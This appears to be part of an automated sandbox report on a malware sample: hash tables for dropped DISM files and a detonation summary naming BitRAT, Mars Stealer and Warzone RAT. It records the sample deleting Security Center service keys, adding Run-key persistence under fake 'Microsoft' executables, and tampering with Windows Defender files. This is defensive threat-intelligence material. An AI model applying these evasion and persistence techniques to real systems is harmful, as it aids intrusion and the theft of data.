| SHA512 | ec369f80889c4411a3fcd07b8ed10bfbc5283ea6a2e7ae82022da63a4a70f2ee96f8f05b8f6d3e7bdddfebaf30086cc2e4ec04233c72046eba7ed082ee78ab82 |
C:\Users\Admin\AppData\Local\Temp\89D6.tmp\89D7.tmp\89D8.bat
| MD5 | a9364ef8f38cb959002706b2cc5ca9b4 |
| SHA1 | 4fbfdd5dbab4c63cdae4876c16f09d0e2d83152a |
| SHA256 | 6eba0633df1319abc32f0a5e5464449b2648db207c7176d0e553dc9fe50f5b27 |
| SHA512 | a3496fc402264166470f9be89712eeff3f1ec7d8fde3d0bb4805d852dd6f4a426d5695895831faa53411d1d73fdcf24a8c6303a8898926f6af66a7589e32d4f3 |
C:\Users\Admin\AppData\Local\Temp\99D726CF-7458-4F4A-B313-AFAE17BC3273\DismHost.exe
| MD5 | e5d5e9c1f65b8ec7aa5b7f1b1acdd731 |
| SHA1 | dbb14dcda6502ab1d23a7c77d405dafbcbeb439e |
| SHA256 | e30508e2088bc16b2a84233ced64995f738deaef2366ac6c86b35c93bbcd9d80 |
| SHA512 | 7cf80d4a16c5dbbf61fcb22ebe30cf78ca42a030b7d7b4ad017f28fba2c9b111e8cf5b3064621453a44869bbaed124d6fb1e8d2c8fe8202f1e47579d874fa4bc |
C:\Users\Admin\AppData\Local\Temp\99D726CF-7458-4F4A-B313-AFAE17BC3273\DismCorePS.dll
| MD5 | a033f16836d6f8acbe3b27b614b51453 |
| SHA1 | 716297072897aea3ec985640793d2cdcbf996cf9 |
| SHA256 | e3b3a4c9c6403cb8b0aa12d34915b67e4eaa5bb911e102cf77033aa315d66a1e |
| SHA512 | ad5b641d93ad35b3c7a3b56cdf576750d1ad4c63e2a16006739888f0702280cad57dd0a6553ef426111c04ceafd6d1e87f6e7486a171fff77f243311aee83871 |
C:\Users\Admin\AppData\Local\Temp\99D726CF-7458-4F4A-B313-AFAE17BC3273\DismProv.dll
| MD5 | 490be3119ea17fa29329e77b7e416e80 |
| SHA1 | c71191c3415c98b7d9c9bbcf1005ce6a813221da |
| SHA256 | ef1e263e1bcc05d9538cb9469dd7dba5093956aa325479c3d2607168cc1c000a |
| SHA512 | 6339b030008b7d009d36abf0f9595da9b793264ebdce156d4a330d095a5d7602ba074075ea05fef3dde474fc1d8e778480429de308c121df0bf3075177f26f13 |
C:\Users\Admin\AppData\Local\Temp\99D726CF-7458-4F4A-B313-AFAE17BC3273\dismprov.dll
| MD5 | 490be3119ea17fa29329e77b7e416e80 |
| SHA1 | c71191c3415c98b7d9c9bbcf1005ce6a813221da |
| SHA256 | ef1e263e1bcc05d9538cb9469dd7dba5093956aa325479c3d2607168cc1c000a |
| SHA512 | 6339b030008b7d009d36abf0f9595da9b793264ebdce156d4a330d095a5d7602ba074075ea05fef3dde474fc1d8e778480429de308c121df0bf3075177f26f13 |
C:\Users\Admin\AppData\Local\Temp\99D726CF-7458-4F4A-B313-AFAE17BC3273\OSProvider.dll
| MD5 | db4c3a07a1d3a45af53a4cf44ed550ad |
| SHA1 | 5dea737faadf0422c94f8f50e9588033d53d13b3 |
| SHA256 | 2165d567aa47264abe2a866bb1bcb01a1455a75a6ea530b1b9a4dda54d08f758 |
| SHA512 | 5182b80459447f3c1fb63b70ad0370e1da26828a7f73083bec0af875b37888dd12ec5a6d9dc84157fc5b535f473ad7019eb6a53b9a47a2e64e6a8b7fae4cddde |
C:\Users\Admin\AppData\Local\Temp\99D726CF-7458-4F4A-B313-AFAE17BC3273\LogProvider.dll
| MD5 | 815a4e7a7342224a239232f2c788d7c0 |
| SHA1 | 430b7526d864cfbd727b75738197230d148de21a |
| SHA256 | a9c8787c79a952779eca82e7389cf5bbde7556e4491b8bfcfd6617740ac7d8a2 |
| SHA512 | 0c19d1e388ed0855a660135dec7a5e6b72ecbb7eb67ff94000f2399bd07df431be538055a61cfb2937319a0ce060898bb9b6996765117b5acda8fc0bad47a349 |
C:\Windows\Logs\DISM\dism.log
| MD5 | 7016bce88b7708cdc8384174026219d8 |
| SHA1 | 789019515f877981a827d30146cd5ff0ddf87216 |
| SHA256 | 542a3f326a465532fe49867072676869312fe1835c2c590d027418e8fdabebc8 |
| SHA512 | 0af652bd1addcec715de68abfb4432be98a8ecfe3a348588e84719b4cb327bb42a2ff81c1ef3edfc19d40877f2c662d5d121828f6990ea539e8b928d41f377a0 |
C:\Users\Admin\AppData\Local\Temp\99D726CF-7458-4F4A-B313-AFAE17BC3273\CbsProvider.dll
| MD5 | 6ad0376a375e747e66f29fb7877da7d0 |
| SHA1 | a0de5966453ff2c899f00f165bbff50214b5ea39 |
| SHA256 | 4c9a4ab6596626482dd2190034fcb3fafebe88a961423962ad577e873ef5008f |
| SHA512 | 8a97b2cc96ec975188e53e428d0fc2c562f4c3493d3c354e316c7f89a0bd25c84246807c9977f0afdda3291b8c23d518a36fd967d8f9d4d2ce7b0af11b96eb18 |
C:\Users\Admin\AppData\Local\Temp\99D726CF-7458-4F4A-B313-AFAE17BC3273\AppxProvider.dll
| MD5 | a7927846f2bd5e6ab6159fbe762990b1 |
| SHA1 | 8e3b40c0783cc88765bbc02ccc781960e4592f3f |
| SHA256 | 913f97dd219eeb7d5f7534361037fe1ecc3a637eb48d67b1c8afa8b5f951ba2f |
| SHA512 | 1eafece2f6aa881193e6374b81d7a7c8555346756ed53b11ca1678f1f3ffb70ae3dea0a30c5a0aab8be45db9c31d78f30f026bb22a7519a0930483d50507243f |
C:\Users\Admin\AppData\Local\Temp\99D726CF-7458-4F4A-B313-AFAE17BC3273\AssocProvider.dll
| MD5 | 94dc379aa020d365ea5a32c4fab7f6a3 |
| SHA1 | 7270573fd7df3f3c996a772f85915e5982ad30a1 |
| SHA256 | dc6a5930c2b9a11204d2e22a3e8d14c28e5bdac548548e256ba7ffa79bd8c907 |
| SHA512 | 998fd10a1f43024a2398491e3764748c0b990b37d8b3c820d281296f8da8f1a2f97073f4fd83543994a6e326fa7e299cb5f59e609358cd77af996175782eeaca |
C:\Users\Admin\AppData\Local\Temp\99D726CF-7458-4F4A-B313-AFAE17BC3273\IBSProvider.dll
| MD5 | 120f0a2022f423fc9aadb630250f52c4 |
| SHA1 | 826df2b752c4f1bba60a77e2b2cf908dd01d3cf7 |
| SHA256 | 5425382aaa32ffc133adb6458ff516db0e2ad60fac52dd595d53c370f4ba6fa0 |
| SHA512 | 23e50735c06cef93d11873fc8e5e29fc63dcf3f01dc56822a17c11ca57bbfb10d46fac6351f84ba30050a16d6bd0744a08a4042a9743a6df87ac8a12e81e2764 |
C:\Users\Admin\AppData\Local\Temp\99D726CF-7458-4F4A-B313-AFAE17BC3273\ProvProvider.dll
| MD5 | 70c34975e700a9d7e120aaecf9d8f14b |
| SHA1 | e24d47f025c0ec0f60ec187bfc664e9347dc2c9c |
| SHA256 | a3e652c0bbe2082f2e0290da73485fb2c6e35c33ac60daa51a65f8c782dbd7a7 |
| SHA512 | 7f6a24345f5724d710e0b6c23b3b251e96d656fac58ea67b2b84d7d9a38d7723eae2c278e6e218e7f69f79d1cce240d91a8b0fd0d99960cacc65d82eb614a260 |
C:\Users\Admin\AppData\Local\Temp\99D726CF-7458-4F4A-B313-AFAE17BC3273\TransmogProvider.dll
| MD5 | 84ae9659e8d28c2bd19d45dbe32b6736 |
| SHA1 | 2a47058eafab4135a55575a359fbd22390788e93 |
| SHA256 | 943ea79ccbbb9790723f411720777af386acc03efab709ac2cbfeb7bd040a3e4 |
| SHA512 | d108a4a8699cd98576a5de9ce2f925697ece546fb441a76db6a922564ea70c54449cb1e8ac049a203979331c2c0ee7790d090ae5bb72d8d5e02786ef1cca530d |
C:\Users\Admin\AppData\Local\Temp\99D726CF-7458-4F4A-B313-AFAE17BC3273\en-US\SysprepProvider.dll.mui
| MD5 | 93d076056dd01dfc64d95d4c552a2dff |
| SHA1 | a90fd06a62c6d63d87e00f5f7e9646b44d2c726a |
| SHA256 | 4389362a9dc662aa3c7a1d830498472bc586e00f0d269a8541975a34b03a1aa4 |
| SHA512 | b089574d4be0ccae205219c9e256de34c039081a547f05acfe4165d036b175de5d9676160effc3c19d87bbb41d0f415da598e507ed8f7b302cdbfdfb81f694ee |
C:\Users\Admin\AppData\Local\Temp\99D726CF-7458-4F4A-B313-AFAE17BC3273\SysprepProvider.dll
| MD5 | 8bd67d87dbdcf881fb9c1f4f6bf83f46 |
| SHA1 | 10bd2e541b6a125c29f05958f496edf31ff9abb1 |
| SHA256 | f9b4d0afe87f434e8319556961b292ddc7d3a8c6fc06b8a08a50b5a96e28a204 |
| SHA512 | 258a4075a3149669ccd6ff602f71a721b195c9d15dea22d994d4d3e35cdf27beb0b8b8f5da8f52914f769642f89edbb1d9d857087778be713a874571a2ec6f89 |
C:\Users\Admin\AppData\Local\Temp\99D726CF-7458-4F4A-B313-AFAE17BC3273\en-US\SmiProvider.dll.mui
| MD5 | f32e38247d0b21476bbfb49989478f7e |
| SHA1 | b950fd72ea2a6a94ee049454df562aed79ca1e35 |
| SHA256 | a1a302e940f6d6718700737b787af7a2053ef68b5ea2ec61497e7ae2444c5835 |
| SHA512 | f483807d790a4bc3e68d6d1f986bd4a57b4a67c91fb3dbef88220a4b510f11d1190cdd98a857eb1937e921e668dff2bcb5e4a7df640b1f3639ce6d2239ff8106 |
C:\Users\Admin\AppData\Local\Temp\99D726CF-7458-4F4A-B313-AFAE17BC3273\SmiProvider.dll
| MD5 | ad7bbb62335f6dc36214d8c9fe1aaca0 |
| SHA1 | f03cb2db64c361d47a1c21f6d714e090d695b776 |
| SHA256 | ac1e7407317859981d253fd9d977e246a4d0da24572c45efe0ade1745376bffb |
| SHA512 | 4ad7132f0ad5a7228ec116c28d23ee9acfdbf4adf535b0b9995f2e7eec8776e652a0a18539c02b6f4b3e0c8fa2f75d5181577dec16993fa55cb971d7e82faac5 |
C:\Users\Admin\AppData\Local\Temp\99D726CF-7458-4F4A-B313-AFAE17BC3273\en-US\SetupPlatformProvider.dll.mui
| MD5 | 73e78fbbf6e6679fa643441c66628d37 |
| SHA1 | 57b70e6226c0cf3f8bc9a939f8b1ec411dedeff5 |
| SHA256 | 5d4dfc9bde18be1ec0b3834a65de6abab581e04c8c4f66ee14a62fb4b1b4cd06 |
| SHA512 | a045a6cdf9ca989b3ed9a50cda208affa17372f65b1d86e1bf4c10b5d5e3fee58c5d4b8ec0749a54e2e2156ed0e9776b59a8d3b78f062349873cb574ab3f77fa |
C:\Users\Admin\AppData\Local\Temp\99D726CF-7458-4F4A-B313-AFAE17BC3273\SetupPlatformProvider.dll
| MD5 | 1ae66f4524911b2728201fff6776903c |
| SHA1 | 68bea62eb0f616af0729dbcbb80dc27de5816a83 |
| SHA256 | 367e73f97318b6663018a83a11019147e67b62ab83988730ebbda93984664dd3 |
| SHA512 | 7abf07d1338e08dc8b65b4f987eaff96d99aa46c892b5d2d79684ca7cf5f139d2634d9b990e5f6730f7f8a647e4fbb3d5905f9f2a5680250852671599f15ee69 |
C:\Users\Admin\AppData\Local\Temp\99D726CF-7458-4F4A-B313-AFAE17BC3273\en-US\ProvProvider.dll.mui
| MD5 | b8a8c6c4cd89eeda1e299c212dc9c198 |
| SHA1 | f88c8a563b20864e0fc6f3d63fadda507aa2e96e |
| SHA256 | 50ad19e21b6425d12aa57cd4656748877db1f147189ec44abb19ba90be8505ea |
| SHA512 | 4a6f0dac5b3b18e4942ce5f51b566ce3ba465baa43457384ee785d1c0e7c33f9b9396a143aac0398a34e4e2f7d704ba06d3cc68761fd3cb6f53f4043a906e475 |
C:\Users\Admin\AppData\Local\Temp\99D726CF-7458-4F4A-B313-AFAE17BC3273\en-US\OSProvider.dll.mui
| MD5 | 0633e0fccd477d9b22de4dd5a84abe53 |
| SHA1 | e04fb5c3acb35d128c1ea6ee6fb0e9b3fe90d5a9 |
| SHA256 | b6758aba17f6cd74923ca0976dd580222851ef6435cd16b3b2b04e85280ce706 |
| SHA512 | e95ed1d8069d6f200f0a2ea8dd7688404af9db9ce5e229afcb625a1f9eb46ac9e7a1c2c4c5ce156b190514415679e82e213732e8e890ed1a89af9026e4e73fe3 |
C:\Users\Admin\AppData\Local\Temp\99D726CF-7458-4F4A-B313-AFAE17BC3273\en-US\OfflineSetupProvider.dll.mui
| MD5 | 015271d46ab128a854a4e9d214ab8a43 |
| SHA1 | 2569deff96fb5ad6db924cee2e08a998ddc80b2a |
| SHA256 | 692744ce4bba1e82ad1a91ab97eec2bac7146bc995e8e8ed59bc2c7d366af7ec |
| SHA512 | 6ba678da0475a6b1872c2e2c151b395a4d97390bed4671d3f918aab5e69cbc9ceafe72c3100ba060ac6586fd37682499fdeef7d7b1ab10f5ec2411c1438ed438 |
C:\Users\Admin\AppData\Local\Temp\99D726CF-7458-4F4A-B313-AFAE17BC3273\OfflineSetupProvider.dll
| MD5 | 9cd7292cca75d278387d2bdfb940003c |
| SHA1 | bab579889ed3ac9cb0f124842c3e495cb2ec92ac |
| SHA256 | b38d322af8e614cc54299effd2164247c75bd7e68e0eb1a428376fcedaca9a6f |
| SHA512 | ebf96839e47bef9e240836b1d02065c703547a2424e05074467fe70f83c1ebf3db6cb71bf0d38848ec25e2e81b4cbb506ced7973b85e2ab2d8e4273de720779d |
C:\Users\Admin\AppData\Local\Temp\99D726CF-7458-4F4A-B313-AFAE17BC3273\en-US\MsiProvider.dll.mui
| MD5 | c5e60ee2d8534f57fddb81ffce297763 |
| SHA1 | 78e6b0e03c8bf5802b3ef429b105d7ae3092a8f2 |
| SHA256 | 1ec7b04a8c25812db99abec82c7b7bf915ae3f7594c5d071231cafab9c1fa145 |
| SHA512 | ce654295e8b16da7bd004453ae4a422fe8296a8c2343e56d819883b835c391a02537ecf4d155a281a9d38f2291ee0004506b7fd48a99c0f8881ff1e38ae8ebcc |
C:\Users\Admin\AppData\Local\Temp\99D726CF-7458-4F4A-B313-AFAE17BC3273\MsiProvider.dll
| MD5 | 9a760ddc9fdca758501faf7e6d9ec368 |
| SHA1 | 5d395ad119ceb41b776690f9085f508eaaddb263 |
| SHA256 | 7ff3939e1ef015da8c9577af4edfdd46f0029a2cfe4e3dac574d3175516e095f |
| SHA512 | 59d095246b62a7777e7d2d50c2474f4b633a1ae96056e4a4cb5265ccf7432fed0ea5df9b350f44d70b55a726241da10f228d8b5cbee9b0890c0b9dc9e810b139 |
C:\Users\Admin\AppData\Local\Temp\99D726CF-7458-4F4A-B313-AFAE17BC3273\en-US\LogProvider.dll.mui
| MD5 | 8933c8d708e5acf5a458824b19fd97da |
| SHA1 | de55756ddbeebc5ad9d3ce950acba5d2fb312331 |
| SHA256 | 6e51af7cfda6be5419f89d6705c44587556a4abffd388020d7f19e007e122cd6 |
| SHA512 | ead5017d9d024a1d7c53634ae725438ea3a34eed8c9056ebbc4ebe5aab2055c0e67687ce7608724e4f66f55aa486a63024967b76a5638cde3dd88b3d3432ca1f |
C:\Users\Admin\AppData\Local\Temp\99D726CF-7458-4F4A-B313-AFAE17BC3273\en-US\IntlProvider.dll.mui
| MD5 | 2eb303db5753eb7a6bb3ab773eeabdcb |
| SHA1 | 44c6c38e6ae5f9ce9d7ca9d45a3cc3020b1353e4 |
| SHA256 | aa43b64db4fdcd89e56ba5309f3ba2ffac2663ba30514e87c160687f4314221f |
| SHA512 | df1c8cefed4b5ef5a47f9bc0c42776611b3af709938a0900db79c6c9f4fae21acbbb6c4b1cad3c5a2051b622fe7e6e01486d34622742a981623fed933f1b1427 |
C:\Users\Admin\AppData\Local\Temp\99D726CF-7458-4F4A-B313-AFAE17BC3273\IntlProvider.dll
| MD5 | 510e132215cef8d09be40402f355879b |
| SHA1 | cae8659f2d3fd54eb321a8f690267ba93d56c6f1 |
| SHA256 | 1bb39f3389aa4258a923fa265afa2279688e6cdb14ff771f1621a56b03ddcf52 |
| SHA512 | 2f7b2ec0e94738838f755759cd35e20ab2138b8eca023ee6ef630ab83a3de1bc0792f12ea0d722abe9a6953626cbddf8ba55ea32fc794d2df677a0625e498ab0 |
C:\Users\Admin\AppData\Local\Temp\99D726CF-7458-4F4A-B313-AFAE17BC3273\en-US\ImagingProvider.dll.mui
| MD5 | f2e2ba029f26341158420f3c4db9a68f |
| SHA1 | 1dee9d3dddb41460995ad8913ad701546be1e59d |
| SHA256 | 32d8c8fb9a746be209db5c3bdad14f361cf2bef8144c32e5af419c28efd35da3 |
| SHA512 | 3d45d7bcf21d5df56b516fc18f7dc1bf80e44258b0c810b199a7bc06047a547060956c9d79575b82d9b6992fb5fe64f5b0ef1e408363887ae81a64b6ff9fa03e |
C:\Users\Admin\AppData\Local\Temp\99D726CF-7458-4F4A-B313-AFAE17BC3273\ImagingProvider.dll
| MD5 | 35e989a1df828378baa340f4e0b2dfcb |
| SHA1 | 59ecc73a0b3f55e43dace3b05ff339f24ec2c406 |
| SHA256 | 874137ee906f91285b9a018735683a0dd21bdeaf2e340cbc54296551ccf8be2d |
| SHA512 | c8d69e37c918881786a8fdab2a2c5d1632411b1f75082aeb3eb24a8ba5f93dcb39b3f4000e651f95452263525d98fd1d3cb834de93bed16fa6f92ef271c3a92a |
C:\Users\Admin\AppData\Local\Temp\99D726CF-7458-4F4A-B313-AFAE17BC3273\en-US\IBSProvider.dll.mui
| MD5 | d4b67a347900e29392613b5d86fe4ac2 |
| SHA1 | fb84756d11bfd638c4b49268b96d0007b26ba2fb |
| SHA256 | 4ccfe7883bce7785b1387ad3872230159899a5337d30a2f81a937b74bcbc4ce5 |
| SHA512 | af0a2a3f813e1adfff972285c9655f50ce6916caaeff5cb82f6c7d76491ffc9b365a47f19750fc02d7122182bf65aae79ed167886c33f202d5a781ab83d75662 |
C:\Users\Admin\AppData\Local\Temp\99D726CF-7458-4F4A-B313-AFAE17BC3273\en-US\GenericProvider.dll.mui
| MD5 | d6b02daf9583f640269b4d8b8496a5dd |
| SHA1 | e3bc2acd8e6a73b6530bc201902ab714e34b3182 |
| SHA256 | 9102fa05ed98d902bf6e95b74fdbb745399d4ce4536a29607b2156a0edfeddf0 |
| SHA512 | 189e87fcc2902e2a8e59773783d80a7d4dd5d2991bd291b0976cbd304f78bd225b353703735b84de41b5f59c37402db634c4acc805d73176cde75ca662efff50 |
C:\Users\Admin\AppData\Local\Temp\99D726CF-7458-4F4A-B313-AFAE17BC3273\GenericProvider.dll
| MD5 | ef7e2760c0a24453fc78359aea3d7869 |
| SHA1 | 0ea67f1fd29df2615da43e023e86046e8e46e2e1 |
| SHA256 | d39f38402a9309ddd1cba67be470ede348f2bc1bab2f8d565e8f15510761087a |
| SHA512 | be785ba6b564cc4e755b4044ae27f916c009b7d942fcd092aed2ae630b1704e8a2f8b4692648eed481a5eb5355fd2e1ef7f94f6fb519b7e1ff6fc3c5f1aaa06f |
C:\Users\Admin\AppData\Local\Temp\99D726CF-7458-4F4A-B313-AFAE17BC3273\en-US\FolderProvider.dll.mui
| MD5 | 22b4a3a1ec3b6d7aa3bc61d0812dc85f |
| SHA1 | 97ae3504a29eb555632d124022d8406fc5b6f662 |
| SHA256 | c81a992ecebd9260ff34e41383aaca1c64a9fa4706a4744ac814f0f5daa1e105 |
| SHA512 | 9329b60a60c45b2486000ed0aff8d260fdac3d0a8789823eaa015eab1a6d577012f9d12502f81bad9902e41545c3c3e77f434bc1a753b4f8430d01db2cdbe26c |
C:\Users\Admin\AppData\Local\Temp\99D726CF-7458-4F4A-B313-AFAE17BC3273\FolderProvider.dll
| MD5 | 4f3250ecb7a170a5eb18295aa768702d |
| SHA1 | 70eb14976ddab023f85bc778621ade1d4b5f4d9d |
| SHA256 | a235317ab7ed89e6530844a78b933d50f6f48ea5df481de158eb99dd8c4ba461 |
| SHA512 | e9ce6cced5029d931d82e78e7e609a892bfe239096b55062b78e8ff38cce34ce6dd4e91efb41c4cd6ecf6017d098e4c9b13d6cb4408d761051468ee7f74bc569 |
C:\Users\Admin\AppData\Local\Temp\99D726CF-7458-4F4A-B313-AFAE17BC3273\en-US\FfuProvider.dll.mui
| MD5 | dc826a9cb121e2142b670d0b10022e22 |
| SHA1 | b2fe459ede8ba99602ae6ea5fa24f0133cca2bc9 |
| SHA256 | ba6695148f96a5d45224324006ae29becfd2a6aa1de947e27371a4eb84e7451a |
| SHA512 | 038e9abff445848c882a71836574df0394e73690bc72642c2aa949c1ad820c5cbb4dedc4ee7b5b75fd5ac8a43813d416f23d28973de7a7f0e5c3f7112da6fe1b |
C:\Users\Admin\AppData\Local\Temp\99D726CF-7458-4F4A-B313-AFAE17BC3273\FfuProvider.dll
| MD5 | df785c5e4aacaee3bd16642d91492815 |
| SHA1 | 286330d2ab07512e1f636b90613afcd6529ada1e |
| SHA256 | 56cc8d139be12e969fff3bbf47b1f5c62c3db887e3fb97c79cf7d285076f9271 |
| SHA512 | 3566de60fe76b63940cff3579da94f404c0bc713f2476ba00b9de12dc47973c7c22d5eed1fd667d20cea29b3c3c4fa648e5f44667e8369c192a4b69046e6f745 |
C:\Users\Admin\AppData\Local\Temp\99D726CF-7458-4F4A-B313-AFAE17BC3273\en-US\DmiProvider.dll.mui
| MD5 | b7252234aa43b7295bb62336adc1b85c |
| SHA1 | b2c42a5af79530e7cf9bcf54fd76ae9d5f234d7f |
| SHA256 | 73709c25dc5300a435e53df97fc01a7dc184b56796cae48ee728d54d26076d6c |
| SHA512 | 88241009b342eb1205b10f7725a7cb1ec2c7135606459d038c4b8847efd9d5e0ad4749621f8df93746dd3ba8ab92d1b0f513ed10e2ba712a7991716f4c062358 |
C:\Users\Admin\AppData\Local\Temp\99D726CF-7458-4F4A-B313-AFAE17BC3273\DmiProvider.dll
| MD5 | ea8488990b95ce4ef6b4e210e0d963b2 |
| SHA1 | cd8bf723aa9690b8ca9a0215321e8148626a27d1 |
| SHA256 | 04f851b9d5e58ed002ad768bdcc475f22905fb1dab8341e9b3128df6eaa25b98 |
| SHA512 | 56562131cbe5f0ea5a2508f5bfed88f21413526f1539fe4864ece5b0e03a18513f3db33c07e7abd7b8aaffc34a7587952b96bb9990d9f4efa886f613d95a5b1b |
C:\Users\Admin\AppData\Local\Temp\99D726CF-7458-4F4A-B313-AFAE17BC3273\en-US\dismprov.dll.mui
| MD5 | 7d06108999cc83eb3a23eadcebb547a5 |
| SHA1 | 200866d87a490d17f6f8b17b26225afeb6d39446 |
| SHA256 | cf8cc85cdd12cf4a02df5274f8d0cdc625c6409fe80866b3052b7d5a862ac311 |
| SHA512 | 9f024aa89392fbbbabe62a58857e5ad5250e05f23d7f78fc9a09f535463446796dd6e37aab5e38dfc0bf5b15533844f63b3bddcb5cb9335901e099f65f9d8002 |
C:\Users\Admin\AppData\Local\Temp\99D726CF-7458-4F4A-B313-AFAE17BC3273\en-US\DismCore.dll.mui
| MD5 | 7a15f6e845f0679de593c5896fe171f9 |
| SHA1 | 0c923dfaffb56b56cba0c28a4eacb66b1b91a1f4 |
| SHA256 | f91e3c35b472f95d7b1ae3dc83f9d6bfde33515aa29e8b310f55d9fe66466419 |
| SHA512 | 5a0373f1fb076a0059cac8f30fe415e06ed880795f84283911bec75de0977baf52432b740b429496999cedf5cca45efd6ef010700e2d9a1887438056c8c573ca |
C:\Users\Admin\AppData\Local\Temp\99D726CF-7458-4F4A-B313-AFAE17BC3273\DismCore.dll
| MD5 | b1f793773dc727b4af1648d6d61f5602 |
| SHA1 | be7ed4e121c39989f2fb343558171ef8b5f7af68 |
| SHA256 | af7f342adf5b533ea6978b68064f39bfb1e4ad3b572ae1b7f2287f5533334d4e |
| SHA512 | 66a92bff5869a56a7931d7ed9881d79c22ba741c55fb42c11364f037e1ec99902db2679b67a7e60cbf760740d5b47dcf1a6dcfae5ad6711a0bd7f086cc054eed |
C:\Users\Admin\AppData\Local\Temp\99D726CF-7458-4F4A-B313-AFAE17BC3273\en-US\CbsProvider.dll.mui
| MD5 | 6c51a3187d2464c48cc8550b141e25c5 |
| SHA1 | a42e5ae0a3090b5ab4376058e506b111405d5508 |
| SHA256 | d7a0253d6586e7bbfb0acb6facd9a326b32ba1642b458f5b5ed27feccb4fc199 |
| SHA512 | 87a9e997d55bc6dbd05af1291fb78cd02266641d018ccfeb6826cb0de205aaf8a57b49e587462dbb6df2b86b54f91c0c5d3f87e64d7dbb2aea75ef143c5447ba |
C:\Users\Admin\AppData\Local\Temp\99D726CF-7458-4F4A-B313-AFAE17BC3273\en-US\AssocProvider.dll.mui
| MD5 | 8833761572f0964bdc1bea6e1667f458 |
| SHA1 | 166260a12c3399a9aa298932862569756b4ecc45 |
| SHA256 | b18c6ce1558c9ef6942a3bce246a46557c2a7d12aec6c4a07e4fa84dd5c422f5 |
| SHA512 | 2a907354ec9a1920b9d1d2aeb9ff7c7314854b36a27f7d88aca17825e74a87413dbe7d1c3fde6a2410b5934f8c80a76f8bb6b7f12e7cfc643ce6622ca516d9b8 |
C:\Users\Admin\AppData\Local\Temp\99D726CF-7458-4F4A-B313-AFAE17BC3273\en-US\AppxProvider.dll.mui
| MD5 | bd0dd9c5a602cb0ad7eabc16b3c1abfc |
| SHA1 | cede6e6a55d972c22da4bc9e0389759690e6b37f |
| SHA256 | 8af0073f8a023f55866e48bf3b902dfa7f41c51b0e8b0fe06f8c496d41f9a7b3 |
| SHA512 | 86351dc31118fc5a12fad6f549aa60c45ebe92b3ce5b90376e41f60d6d168a8a9f6c35320fc2cdcc750e67a5751651657fe64cf42690943500afd0d1dae2cd0c |
Analysis: behavioral1
Detonation Overview
Submitted
2023-01-03 19:42
Reported
2023-01-03 19:47
Platform
win7-20221111-en
Max time kernel
146s
Max time network
157s
Command Line
Signatures
BitRAT
Mars Stealer
Modifies security service
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wscsvc\Parameters | C:\Windows\SysWOW64\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wscsvc\Security | C:\Windows\SysWOW64\reg.exe | N/A |
WarzoneRat, AveMaria
Warzone RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft.exe | N/A |
| N/A | N/A | C:\Program Files\Builded.exe | N/A |
| N/A | N/A | C:\Program Files\installerX32.exe | N/A |
| N/A | N/A | C:\Program Files\InstallerX64.exe | N/A |
| N/A | N/A | C:\Program Files\Microsoft office.exe | N/A |
Stops running service(s)
Loads dropped DLL
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Local\\temp\\svchost" | C:\Program Files\Microsoft office.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program Files\\Microsoft.exe" | C:\Program Files\Microsoft.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft office.exe | N/A |
| N/A | N/A | C:\Program Files\Microsoft office.exe | N/A |
| N/A | N/A | C:\Program Files\Microsoft office.exe | N/A |
| N/A | N/A | C:\Program Files\Microsoft office.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Windows Defender\MpCommu.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\es-ES\MpAsDesc.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\fr-FR\MpEvMsg.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Program Files\installerX32.exe | C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx32.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\en-US\MpEvMsg.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\de-DE\MpAsDesc.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\en-US\MpAsDesc.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\en-US\MpEvMsg.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\en-US\MsMpRes.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\MsMpRes.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\de-DE\MpAsDesc.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\MpClient.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\MpOAV.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\MsMpCom.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\MsMpLics.dll | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Program Files\Builded.exe | C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx32.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\ja-JP\MpAsDesc.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\MpSvc.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\MsMpLics.dll | C:\Windows\system32\cmd.exe | N/A |
